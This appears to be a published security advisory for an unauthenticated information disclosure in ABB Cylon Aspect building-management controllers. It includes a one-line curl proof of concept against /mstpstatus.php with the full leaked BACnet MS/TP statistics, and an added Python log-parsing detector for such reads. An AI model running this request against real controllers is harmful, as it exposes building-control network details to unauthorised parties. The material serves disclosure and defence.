ABB Cylon Aspect 3.08.01 mstpstatus.php Information Disclosure
Posted Dec 2, 2024
Authored by LiquidWorm | Site zeroscience.mk

ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated information disclosure vulnerability. An unauthorized attacker can reference the affected page and disclose various BACnet MS/TP statistics running on the device.

tags | exploit, info disclosure
SHA-256 | 401fb887776d514d63369b3b8c3ccac1e8c60f72e1af99315a52566d675274c2


ABB Cylon Aspect 3.08.01 (mstpstatus.php) Information Disclosure


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an unauthenticated information
disclosure vulnerability. An unauthorized attacker can reference the affected
page and disclose various BACnet MS/TP statistics running on the device.

Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2024-5865
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5865.php


21.04.2024

--




$ curl http://192.168.73.31/mstpstatus.php
Thu Nov 28 10:13:51 UTC 2024<br><div id='Port 0Stat' class='portStats'><div id='Port 0Load'>Port 0 Load: 123 Average time (ms) to wait for token return
47 Average time (ms) to wait for for a reply
20 Max info frames
1063 Estimated time for max_nfo_frmaes tx plus token cycle (ms)
18 Estimated max rate (trasactions per sec)
38 congestion threashold
%</div><div id='Port 0BPSTotal'>Port 0 BPS (Total): </div><div id='Port 0BPSOurs'>Port 0 BPS (Mine): </div></div><div id='Port 1Stat' class='portStats'><div id='Port 1Load'>Port 1 Load: 34 Average time (ms) to wait for token return
40 Average time (ms) to wait for for a reply
20 Max info frames
834 Estimated time for max_nfo_frmaes tx plus token cycle (ms)
23 Estimated max rate (trasactions per sec)
48 congestion threashold
%</div><div id='Port 1BPSTotal'>Port 1 BPS (Total): </div><div id='Port 1BPSOurs'>Port 1 BPS (Mine): </div></div><br />
$Id: mstp.ko R_03_05_01 Thu Sep 23 09:30:32 EDT 2021 $ <br />
Proto: 0<br />
<br />
Port 0 Statistics =======================<br />
Baud Rate: 38400<br />
RX Characters: 60521<br />
RX echoes: 0<br />
RX Errors: 31<br />
TX Characters: 49671<br />
Echo detect fails: 0<br />
<br />
Port 0 MSTP State =======================<br />
ValidRXFrameCnt: 42320<br />
InvdRXFrameCnt: 61<br />
rxDataFrames: 16558<br />
rxToken: 29242<br />
TXFrameCnt: 2072<br />
TXQueCnt: 1<br />
CongestionCnt: 0<br />
Poll_Station: 0<br />
SoleMaster: FALSE<br />
<br />
Port 0 config =======================<br />
Nmax_master: 127<br />
Nmax_info_frames: 20<br />
This_Station: 0<br />
Tno_token: 500<br />
Tusage timeout 30<br />
congestion (auto): 38<br />
Npoll: 50<br />
<br />
<br />
Port 1 Statistics =======================<br />
Baud Rate: 38400<br />
RX Characters: 0<br />
RX echoes: 0<br />
RX Errors: 0<br />
TX Characters: 33632<br />
Echo detect fails: 0<br />
<br />
Port 1 MSTP State =======================<br />
ValidRXFrameCnt: 0<br />
InvdRXFrameCnt: 0<br />
rxDataFrames: 0<br />
rxToken: 0<br />
TXFrameCnt: 2<br />
TXQueCnt: 0<br />
CongestionCnt: 0<br />
Poll_Station: 29<br />
SoleMaster: TRUE<br />
<br />
Port 1 config =======================<br />
Nmax_master: 127<br />
Nmax_info_frames: 20<br />
This_Station: 0<br />
Tno_token: 500<br />
Tusage timeout 30<br />
congestion (auto): 48<br />
Npoll: 50<br />
<br />
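Because the page is served without authentication, the only place a defender can see it being read is the web server access log (the advisory lists lighttpd and Apache as the servers in use). The following detection is an added example, not part of the advisory: it parses combined-format access log lines, and flags successful requests to /mstpstatus.php from outside an assumed operator network (192.168.73.0/24 here is a placeholder; the log lines are constructed).

```python
import ipaddress
import re

# Combined/common log format as written by lighttpd and Apache.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Endpoint named in ZSL-2024-5865; it answers without any authentication.
SENSITIVE_PATHS = {"/mstpstatus.php"}

# Assumed management network from which BMS operators are expected to connect.
ALLOWED_NETS = [ipaddress.ip_network("192.168.73.0/24")]

def parse_line(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # Compare the path without its query string.
    rec["path"] = rec["path"].split("?", 1)[0]
    return rec

def is_allowed(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in ALLOWED_NETS)

def find_disclosure_hits(lines):
    """Return (ip, path, status) for successful reads of the status page from outside the allowed networks."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"] in SENSITIVE_PATHS and rec["status"] == "200" and not is_allowed(rec["ip"]):
            hits.append((rec["ip"], rec["path"], rec["status"]))
    return hits

# Constructed sample log lines: one operator read, two reads from outside the allowed network.
SAMPLE_LOG = [
    '192.168.73.10 - - [28/Nov/2024:10:13:51 +0000] "GET /mstpstatus.php HTTP/1.1" 200 3412 "-" "curl/8.4.0"',
    '10.9.8.7 - - [28/Nov/2024:10:14:02 +0000] "GET /mstpstatus.php HTTP/1.1" 200 3412 "-" "curl/8.4.0"',
    '10.9.8.7 - - [28/Nov/2024:10:14:05 +0000] "GET /index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [28/Nov/2024:10:15:00 +0000] "GET /mstpstatus.php?x=1 HTTP/1.1" 200 3412 "-" "python-requests/2.31"',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for ip, path, status in find_disclosure_hits(SAMPLE_LOG):
        print(f"unauthenticated status-page read: {ip} -> {path} ({status})")
```

Until a fixed firmware is applied, the same path list can drive a web server access restriction so that the page is only reachable from the management network.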